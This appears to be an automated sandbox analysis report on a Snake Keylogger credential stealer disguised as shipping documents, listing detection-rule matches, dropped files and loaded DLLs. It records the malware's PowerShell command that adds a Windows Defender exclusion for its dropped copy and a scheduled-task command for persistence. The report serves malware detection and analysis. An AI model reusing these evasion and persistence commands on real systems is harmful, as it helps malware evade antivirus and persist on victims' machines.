Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.a040000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.3608ac8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Copy shipping docs PO EV1786 LY ECO PAK EV1.exe.36e3ed8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe PID: 6300, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SNgtfGzYQ.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/9@4/4

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File created: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Mutant created: \Sessions\1\BaseNamedObjects\DJHuCRq

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp

Jump to behavior

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.000000000349D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

File read: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe "C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe"
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
